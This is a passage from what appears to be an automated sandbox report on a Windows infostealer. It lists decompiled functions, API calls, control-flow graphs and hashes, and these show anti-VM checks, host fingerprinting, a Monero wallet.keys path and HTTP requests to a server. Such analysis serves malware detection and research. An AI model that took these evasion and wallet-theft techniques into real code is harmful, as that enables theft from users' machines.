                                          • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 00925383
                                          • Part of subcall function 009252C0: lstrlen.KERNEL32(00000000), ref: 009253AE
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0092578B
                                        • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00925940
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925A0C
                                        • Sleep.KERNEL32(0000EA60), ref: 00925A1B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpylstrlen$Sleep
                                        • String ID: 0Zj$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                        • API String ID: 507064821-2987257194
                                        • Opcode ID: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                                        • Instruction ID: 68a9b22095710ad11ab00d269c7d971b0b49afc19c9919ba15954a839c274328
                                        • Opcode Fuzzy Hash: 00f499ffa02e44a24d9e6a4ec6efeec0ed71596fbf579aeb29e23f3c906bcf93
                                        • Instruction Fuzzy Hash: 9DE11072910218ABCB14FBA0FC56FED733DAF94300F508568F5066719AEF346A49CB96
                                        Function 009217A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1301 9217a0-9217cd call 92aad0 StrCmpCA 1304 9217d7-9217f1 call 92aad0 1301->1304 1305 9217cf-9217d1 ExitProcess 1301->1305 1309 9217f4-9217f8 1304->1309 1310 9219c2-9219cd call 92a800 1309->1310 1311 9217fe-921811 1309->1311 1313 921817-92181a 1311->1313 1314 92199e-9219bd 1311->1314 1316 921932-921943 StrCmpCA 1313->1316 1317 921913-921924 StrCmpCA 1313->1317 1318 921970-921981 StrCmpCA 1313->1318 1319 9218f1-921902 StrCmpCA 1313->1319 1320 921951-921962 StrCmpCA 1313->1320 1321 921835-921844 call 92a820 1313->1321 1322 92187f-921890 StrCmpCA 1313->1322 1323 92185d-92186e StrCmpCA 1313->1323 1324 921821-921830 call 92a820 1313->1324 1325 921849-921858 call 92a820 1313->1325 1326 9218cf-9218e0 StrCmpCA 1313->1326 1327 92198f-921999 call 92a820 1313->1327 1328 9218ad-9218be StrCmpCA 1313->1328 1314->1309 1329 921945-921948 1316->1329 1330 92194f 1316->1330 1350 921930 1317->1350 1351 921926-921929 1317->1351 1334 921983-921986 1318->1334 1335 92198d 1318->1335 1348 921904-921907 1319->1348 1349 92190e 1319->1349 1331 921964-921967 1320->1331 1332 92196e 1320->1332 1321->1314 1342 921892-92189c 1322->1342 1343 92189e-9218a1 1322->1343 1340 921870-921873 1323->1340 1341 92187a 1323->1341 1324->1314 1325->1314 1346 9218e2-9218e5 1326->1346 1347 9218ec 1326->1347 1327->1314 1344 9218c0-9218c3 1328->1344 1345 9218ca 1328->1345 1329->1330 1330->1314 1331->1332 1332->1314 1334->1335 1335->1314 1340->1341 1341->1314 1355 9218a8 1342->1355 1343->1355 1344->1345 1345->1314 1346->1347 1347->1314 1348->1349 1349->1314 1350->1314 1351->1350 1355->1314
                                        APIs
                                        • StrCmpCA.SHLWAPI(00000000,block), ref: 009217C5
                                        • ExitProcess.KERNEL32 ref: 009217D1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExitProcess
                                        • String ID: block
                                        • API String ID: 621844428-2199623458
                                        • Opcode ID: 33924f173ccb76c3309297c6b7e3f982e170624052006cf1040796aed9e296ea
                                        • Instruction ID: c6d503b7d631ce535db4e34cf8372c19444a67d6a6290378e010407b86c3539e
                                        • Opcode Fuzzy Hash: 33924f173ccb76c3309297c6b7e3f982e170624052006cf1040796aed9e296ea
                                        • Instruction Fuzzy Hash: D5514CB9A04219EFCB04DFA0E9A4BBE77B9BF94704F104448E416A7344D774E9A1CF62
                                        Function 00927500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1356 927500-92754a GetWindowsDirectoryA 1357 927553-9275c7 GetVolumeInformationA call 928d00 * 3 1356->1357 1358 92754c 1356->1358 1365 9275d8-9275df 1357->1365 1358->1357 1366 9275e1-9275fa call 928d00 1365->1366 1367 9275fc-927617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 927628-927658 wsprintfA call 92a740 1367->1369 1370 927619-927626 call 92a740 1367->1370 1377 92767e-92768e 1369->1377 1370->1377
                                        APIs
                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00927542
                                        • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0092757F
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927603
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0092760A
                                        • wsprintfA.USER32 ref: 00927640
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                        • String ID: :$C$\
                                        • API String ID: 1544550907-3809124531
                                        • Opcode ID: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                                        • Instruction ID: b02316957ef1892a5b926a535e718bd6fb64d1c87cd350b7bd84443d3ae7b451
                                        • Opcode Fuzzy Hash: 6fe2d564ee1dbcd4fc1db847c4c9e160e561399d84fede53abece6553c5778a8
                                        • Instruction Fuzzy Hash: F34181B1D05358ABDB10DF94EC45BEEBBB8EF48704F100199F50977284DB786A44CBA5
                                        Function 009269F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2428), ref: 009298A1
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2230), ref: 009298BA
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B22A8), ref: 009298D2
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B22C0), ref: 009298EA
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2368), ref: 00929903
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B8F28), ref: 0092991B
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006A59F0), ref: 00929933
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006A5A90), ref: 0092994C
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2218), ref: 00929964
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B23F8), ref: 0092997C
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B24E8), ref: 00929995
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B2458), ref: 009299AD
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006A5870), ref: 009299C5
                                          • Part of subcall function 00929860: GetProcAddress.KERNEL32(74DD0000,006B24D0), ref: 009299DE
                                          • Part of subcall function 0092A740: lstrcpy.KERNEL32(00930E17,00000000), ref: 0092A788
                                          • Part of subcall function 009111D0: ExitProcess.KERNEL32 ref: 00911211
                                          • Part of subcall function 00911160: GetSystemInfo.KERNEL32(?), ref: 0091116A
                                          • Part of subcall function 00911160: ExitProcess.KERNEL32 ref: 0091117E
                                          • Part of subcall function 00911110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0091112B
                                          • Part of subcall function 00911110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00911132
                                          • Part of subcall function 00911110: ExitProcess.KERNEL32 ref: 00911143
                                          • Part of subcall function 00911220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                                          • Part of subcall function 00911220: __aulldiv.LIBCMT ref: 00911258
                                          • Part of subcall function 00911220: __aulldiv.LIBCMT ref: 00911266
                                          • Part of subcall function 00911220: ExitProcess.KERNEL32 ref: 00911294
                                          • Part of subcall function 00926770: GetUserDefaultLangID.KERNEL32 ref: 00926774
                                          • Part of subcall function 00911190: ExitProcess.KERNEL32 ref: 009111C6
                                          • Part of subcall function 00927850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009111B7), ref: 00927880
                                          • Part of subcall function 00927850: RtlAllocateHeap.NTDLL(00000000), ref: 00927887
                                          • Part of subcall function 00927850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0092789F
                                          • Part of subcall function 009278E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00927910
                                          • Part of subcall function 009278E0: RtlAllocateHeap.NTDLL(00000000), ref: 00927917
                                          • Part of subcall function 009278E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0092792F
                                          • Part of subcall function 0092A9B0: lstrlen.KERNEL32(?,006B9188,?,\Monero\wallet.keys,00930E17), ref: 0092A9C5
                                          • Part of subcall function 0092A9B0: lstrcpy.KERNEL32(00000000), ref: 0092AA04
                                          • Part of subcall function 0092A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0092AA12
                                          • Part of subcall function 0092A8A0: lstrcpy.KERNEL32(?,00930E17), ref: 0092A905
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                                        • Sleep.KERNEL32(00001770), ref: 00926B04
                                        • CloseHandle.KERNEL32(?,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                                        • ExitProcess.KERNEL32 ref: 00926B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                        • String ID:
                                        • API String ID: 2525456742-0
                                        • Opcode ID: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                                        • Instruction ID: 4978d9055bc26413ef4afb0b049c42c0a5ea1102fdcecde83084502cdc4e5b7a
                                        • Opcode Fuzzy Hash: ed7eb5711966821ab6920f70f72bb8897fa4b50665c648f47918697c4fe74141
                                        • Instruction Fuzzy Hash: A3312172A04228ABDB04FBF0FC57BEEB778AF94341F104518F212B2199DF745945CAA6
                                        Function 00911220 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1436 911220-911247 call 9289b0 GlobalMemoryStatusEx 1439 911273-91127a 1436->1439 1440 911249-911271 call 92da00 * 2 1436->1440 1442 911281-911285 1439->1442 1440->1442 1444 911287 1442->1444 1445 91129a-91129d 1442->1445 1447 911292-911294 ExitProcess 1444->1447 1448 911289-911290 1444->1448 1448->1445 1448->1447
                                        APIs
                                        • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0091123E
                                        • __aulldiv.LIBCMT ref: 00911258
                                        • __aulldiv.LIBCMT ref: 00911266
                                        • ExitProcess.KERNEL32 ref: 00911294
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                        • String ID: @
                                        • API String ID: 3404098578-2766056989
                                        • Opcode ID: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                                        • Instruction ID: 5432d1320e76f09028c22378c4ff5381f47667cde79dd030ef8d2a3626b243ae
                                        • Opcode Fuzzy Hash: 1bdd3b939e276e66a60d319cec187898b9ce44eb5341fb856b8744c379f54e5f
                                        • Instruction Fuzzy Hash: C6016DB0E4531CBBEF10DBE0DC4ABDEBBB8AB54702F208548E705B62C0DB7455818B99
                                        Function 00926AF3 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 1450 926af3 1451 926b0a 1450->1451 1453 926aba-926ad7 call 92aad0 OpenEventA 1451->1453 1454 926b0c-926b22 call 926920 call 925b10 CloseHandle ExitProcess 1451->1454 1460 926af5-926b04 CloseHandle Sleep 1453->1460 1461 926ad9-926af1 call 92aad0 CreateEventA 1453->1461 1460->1451 1461->1454
                                        APIs
                                        • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926ACA
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00926AE8
                                        • CloseHandle.KERNEL32(00000000), ref: 00926AF9
                                        • Sleep.KERNEL32(00001770), ref: 00926B04
                                        • CloseHandle.KERNEL32(?,00000000,?,006B9008,?,0093110C,?,00000000,?,00931110,?,00000000,00930AEF), ref: 00926B1A
                                        • ExitProcess.KERNEL32 ref: 00926B22
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                        • String ID:
                                        • API String ID: 941982115-0
                                        • Opcode ID: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                                        • Instruction ID: f213d2ce21cdaa48c3a1686af65c2daa6e60e234a3258933bed02b7d26088f6a
                                        • Opcode Fuzzy Hash: 3cdafdda46d7230089c70b830bfddeb1f40feb28c7d3f7d7bf24e2e52b70d131
                                        • Instruction Fuzzy Hash: 1EF05E30944329EBE710ABA0EC16BBD7B34EF54702F104A54B502B25C9CFB05940D656
                                        Function 009147B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 63stringnetworkCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00914839
                                        • InternetCrackUrlA.WININET(00000000,00000000), ref: 00914849
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786995393.0000000000E1A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787120910.0000000000FC2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1787139261.0000000000FC3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_910000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CrackInternetlstrlen
                                        • String ID: <
                                        • API String ID: 1274457161-4251816714
                                        • Opcode ID: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                                        • Instruction ID: c096f88b55bec928c044c6a19352ee664351af0adc709922471dbca84c76208d
                                        • Opcode Fuzzy Hash: 4d94ea8aba3bd5b32aa681d4d72b0f0819292c6d550b81bd10c2d5b70a527d39
                                        • Instruction Fuzzy Hash: AA210EB1D00209ABDF14DFA4E845BDE7B75FF45320F108625F915A7291EB706A05CB91
                                        Function 009251F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                          • Part of subcall function 0092A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0092A7E6
                                          • Part of subcall function 00916280: InternetOpenA.WININET(00930DFE,00000001,00000000,00000000,00000000), ref: 009162E1
                                          • Part of subcall function 00916280: StrCmpCA.SHLWAPI(?,006BEAA8), ref: 00916303
                                          • Part of subcall function 00916280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00916335
                                          • Part of subcall function 00916280: HttpOpenRequestA.WININET(00000000,GET,?,006BE230,00000000,00000000,00400100,00000000), ref: 00916385
                                          • Part of subcall function 00916280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009163BF
                                          • Part of subcall function 00916280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009163D1
                                        • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00925228
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1786540961.0000000000911000.00000040.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                        • Associated: 00000000.00000002.1786524520.0000000000910000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.00000000009F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786540961.0000000000B5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000B6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000DDB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E03000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1786724469.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
